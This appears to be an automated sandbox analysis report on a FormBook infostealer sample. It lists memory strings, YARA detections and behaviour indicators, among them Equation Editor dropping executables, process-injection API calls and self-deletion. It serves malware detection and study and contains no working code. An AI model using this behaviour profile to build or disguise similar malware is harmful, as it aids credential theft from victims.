Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2120970745.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000007.00000000.2113858864.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2113887423.00000000041AD000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000007.00000000.2113887423.00000000041AD000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1#
Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1y

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419D60 NtCreateFile, 6_2_00419D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E10 NtReadFile, 6_2_00419E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E90 NtClose, 6_2_00419E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419F40 NtAllocateVirtualMemory, 6_2_00419F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E8A NtClose, 6_2_00419E8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C00C4 NtCreateFile,LdrInitializeThunk, 6_2_008C00C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_008C0048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C0078 NtResumeThread,LdrInitializeThunk, 6_2_008C0078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BF9F0 NtClose,LdrInitializeThunk, 6_2_008BF9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BF900 NtReadFile,LdrInitializeThunk, 6_2_008BF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_008BFAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_008BFAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_008BFBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_008BFB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_008BFC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_008BFC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFD8C NtDelayExecution,LdrInitializeThunk, 6_2_008BFD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_008BFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_008BFEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_008BFED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFFB4 NtCreateSection,LdrInitializeThunk, 6_2_008BFFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C10D0 NtOpenProcessToken, 6_2_008C10D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C0060 NtQuerySection, 6_2_008C0060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C01D4 NtSetValueKey, 6_2_008C01D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C010C NtOpenDirectoryObject, 6_2_008C010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C1148 NtOpenThread, 6_2_008C1148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C07AC NtCreateMutant, 6_2_008C07AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BF8CC NtWaitForSingleObject, 6_2_008BF8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BF938 NtWriteFile, 6_2_008BF938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C1930 NtSetContextThread, 6_2_008C1930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFAB8 NtQueryValueKey, 6_2_008BFAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFA20 NtQueryInformationFile, 6_2_008BFA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFA50 NtEnumerateValueKey, 6_2_008BFA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFBE8 NtQueryVirtualMemory, 6_2_008BFBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFB50 NtCreateKey, 6_2_008BFB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFC30 NtOpenProcess, 6_2_008BFC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFC48 NtSetInformationFile, 6_2_008BFC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C0C40 NtGetContextThread, 6_2_008C0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008C1D80 NtSuspendThread, 6_2_008C1D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFD5C NtEnumerateKey, 6_2_008BFD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFE24 NtWriteVirtualMemory, 6_2_008BFE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFFFC NtCreateProcessEx, 6_2_008BFFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008BFF34 NtQueueApcThread, 6_2_008BFF34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F700C4 NtCreateFile,LdrInitializeThunk, 9_2_01F700C4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F707AC NtCreateMutant,LdrInitializeThunk, 9_2_01F707AC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6F9F0 NtClose,LdrInitializeThunk, 9_2_01F6F9F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6F900 NtReadFile,LdrInitializeThunk, 9_2_01F6F900
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_01F6FBB8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_01F6FB68
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FB50 NtCreateKey,LdrInitializeThunk, 9_2_01F6FB50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_01F6FAE8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_01F6FAD0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_01F6FAB8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_01F6FDC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FD8C NtDelayExecution,LdrInitializeThunk, 9_2_01F6FD8C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_01F6FC60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FFB4 NtCreateSection,LdrInitializeThunk, 9_2_01F6FFB4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_01F6FED0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F701D4 NtSetValueKey, 9_2_01F701D4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F71148 NtOpenThread, 9_2_01F71148
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7010C NtOpenDirectoryObject, 9_2_01F7010C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F710D0 NtOpenProcessToken, 9_2_01F710D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F70078 NtResumeThread, 9_2_01F70078
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F70060 NtQuerySection, 9_2_01F70060
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F70048 NtProtectVirtualMemory, 9_2_01F70048
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F71930 NtSetContextThread, 9_2_01F71930
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6F938 NtWriteFile, 9_2_01F6F938
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6F8CC NtWaitForSingleObject, 9_2_01F6F8CC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FBE8 NtQueryVirtualMemory, 9_2_01F6FBE8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FA50 NtEnumerateValueKey, 9_2_01F6FA50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FA20 NtQueryInformationFile, 9_2_01F6FA20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F71D80 NtSuspendThread, 9_2_01F71D80
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FD5C NtEnumerateKey, 9_2_01F6FD5C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FC90 NtUnmapViewOfSection, 9_2_01F6FC90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F70C40 NtGetContextThread, 9_2_01F70C40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FC48 NtSetInformationFile, 9_2_01F6FC48
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FC30 NtOpenProcess, 9_2_01F6FC30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FFFC NtCreateProcessEx, 9_2_01F6FFFC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FF34 NtQueueApcThread, 9_2_01F6FF34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FEA0 NtReadVirtualMemory, 9_2_01F6FEA0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FE24 NtWriteVirtualMemory, 9_2_01F6FE24
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099D60 NtCreateFile, 9_2_00099D60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099E10 NtReadFile, 9_2_00099E10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099E90 NtClose, 9_2_00099E90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099F40 NtAllocateVirtualMemory, 9_2_00099F40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099E8A NtClose, 9_2_00099E8A
Deletes files inside the Windows folder
Source: C:\Windows\SysWOW64\cmd.exe File deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_003541BE 4_2_003541BE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00353738 4_2_00353738
Source: C:\Users\Public\vbc.exe Code function: 4_2_00350908 4_2_00350908
Source: C:\Users\Public\vbc.exe Code function: 4_2_00353C48 4_2_00353C48
Source: C:\Users\Public\vbc.exe Code function: 4_2_00350ED0 4_2_00350ED0
Source: C:\Users\Public\vbc.exe Code function: 4_2_003525E8 4_2_003525E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00353728 4_2_00353728
Source: C:\Users\Public\vbc.exe Code function: 4_2_00356930 4_2_00356930
Source: C:\Users\Public\vbc.exe Code function: 4_2_003529C8 4_2_003529C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00356B84 4_2_00356B84
Source: C:\Users\Public\vbc.exe Code function: 4_2_00358DDF 4_2_00358DDF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00350EC0 4_2_00350EC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00CA1891 4_2_00CA1891
Source: C:\Users\Public\vbc.exe Code function: 4_2_00CA18A0 4_2_00CA18A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_04875918 4_2_04875918
Source: C:\Users\Public\vbc.exe Code function: 4_2_04871593 4_2_04871593
Source: C:\Users\Public\vbc.exe Code function: 4_2_048765FF 4_2_048765FF
Source: C:\Users\Public\vbc.exe Code function: 4_2_04878684 4_2_04878684
Source: C:\Users\Public\vbc.exe Code function: 4_2_04870007 4_2_04870007
Source: C:\Users\Public\vbc.exe Code function: 4_2_04870048 4_2_04870048
Source: C:\Users\Public\vbc.exe Code function: 4_2_0487C3B0 4_2_0487C3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041D160 6_2_0041D160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041DAD4 6_2_0041DAD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409E40 6_2_00409E40
